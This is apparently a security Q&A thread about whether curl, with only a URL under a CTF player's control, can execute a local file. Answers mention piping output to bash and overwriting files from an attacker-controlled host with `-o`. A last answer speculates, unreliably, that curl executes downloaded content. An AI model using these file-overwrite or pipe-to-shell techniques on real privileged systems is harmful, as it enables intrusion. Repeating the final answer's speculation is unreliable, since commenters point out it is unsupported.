5

I wonder if it is possible to execute bash code or a local file from cURL, that is, using the following syntax:

curl "local file"

I was looking for possible solutions and found that to read the local files of the system can be done with "file://" as follows:

curl "file:///root/script.sh"

However this seems to be equivalent to a "cat" or a "more", that is, it opens the file but does not execute it, so is it possible to execute bash instructions or execute the file using the previous syntax from cURL?

schroeder
  • 123,438
  • 55
  • 284
  • 319
Julián
  • 249
  • 1
  • 4
  • 10

4 Answers4

7

Not sure if this is against the spirit of what you are asking but you can pipe the output of a shell script to bash. e.g. curl "file:///root/script.sh" | bash

Also take a look at a list of known curl vulnerabilities... I'm not aware of a good one for your purpose but if I needed to execute code with only curl I would look at its known vulnerabilities.

schroeder
  • 123,438
  • 55
  • 284
  • 319
DarkMatter
  • 2,671
  • 2
  • 5
  • 23
  • Maybe, but I wanted to know if it is possible to do it without any pipe or cURL option, ie using the URL, at the beginning I was thinking something like curl "file:///root/script.sh | bash" – Julián Nov 01 '18 at 14:51
  • no curl options allowed? – DarkMatter Nov 01 '18 at 14:52
  • No, only the url :( – Julián Nov 01 '18 at 14:54
  • 2
    @Julián I got nothing sorry :/ – DarkMatter Nov 01 '18 at 14:59
  • 8
    I feel like this is an [XY Problem](http://xyproblem.info/). Can you explain _why_ you need to do this? – Mike Ounsworth Nov 01 '18 at 15:00
  • It is a CTF challenge, what happens is that every so often curl is executed with privileges, and the only parameter that I can modify until now is the URL, therefore I can only read files, but not execute them... However, they have cleared my doubt of whether or not it could be cURL :) – Julián Nov 02 '18 at 14:12
  • @Julián does it have to be a local file? Does it have an internet connection? What version of curl? – DarkMatter Nov 02 '18 at 14:56
1

Not without exploiting a vulnerability in either cURL, one of the libraries it uses, or the terminal emulator the output is printed to. While there certainly have been vulnerabilities in the utility that allowed for arbitrary code execution, there is no supported method to execute a file just by accessing it.

forest
  • 64,616
  • 20
  • 206
  • 257
0

There is no way to directly execute code just by accessing an URL with curl. file:// URLs read local files, and other URL schemes access files over the network. All of those only execute code that's an intended part of curl itself (including the underlying libraries and operating system).

Technically it's possible to design filesystems that execute arbitrary code when accessing a file. Typically such a filesystem would use FUSE. However, a filesystem that allows arbitrary code execution by just reading from a file would be unusual. You can't expect to find such a thing on a typical system (and if you could set it up, you'd already have a way to execute arbitrary code).

If you can pass arbitrary arguments to a curl command line, you can pass options, i.e. arguments beginning with -. However, with curl, if you can only pass a single argument, I don't think you can do anything interesting: curl wants a URL, and if you only pass an option instead, you'll only get a boring result (e.g. curl --version) or an error. If you can pass multiple arguments, then I still can't find a way to directly execute arbitrary code, however you can overwrite arbitrary files (curl -o /some/path http://server-under-my-control.example.org/whatever), which is very damaging in itself and often leads to subsequent arbitrary code execution.

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
-2

curl url > file

Does not appear to be safe. Perhaps piping filters the data through stdin in such a way that commands embedded in the data can become executed in the process, compromising your system, at least that is my experience.

The behavior seems counter intuitive. It appears to parse the incoming file and perform additional actions based on its contents by default. We are left to wonder what those actions could have been since it happens at computer speeds.

:(

Incident...

  • The following link received in FaceBook message was selected and the screen flashed suggesting it attempted something. Subsequently, it became clear it is not a YouTube domain.
  • I then curled it to a file and got a HTML loading a JavaScript.
  • I then curled the JavaScript link to file but in addition to the file text of some kind began streaming on my console. I became concern that the original curled JavaScript somehow became executed, at least in part.

Here is the link (maligned to prevent accidental invocation):

http:// youtube.9m4i.com/ Ug8TpQ9

Unfortunately, it seems the behavior has changes.

George
  • 97
  • 2
  • 2
    You claim it's not safe, but you don't say why. “Perhaps piping filters the data through stdin in such a way that commands embedded in the data can become executed in the process” — there's no piping involved here, at least not explicitly. Whether commands can become executed is the whole point of the question. Can they? – Gilles 'SO- stop being evil' Jul 13 '22 at 06:34
  • This isn't an answer. This is a story of when you tried to curl a file and something strange happened, but you don't know why. – schroeder Jul 13 '22 at 15:37
  • Yeah. The behavior seems counter intuitive. It appears to parse the incoming file and perform additional actions by default. It does not merely get a file but gets a file and does stuff based on its contents. – George Jul 13 '22 at 15:54
  • This is pure speculation, though. And not enough details to understand what actually happened. – schroeder Jul 13 '22 at 15:59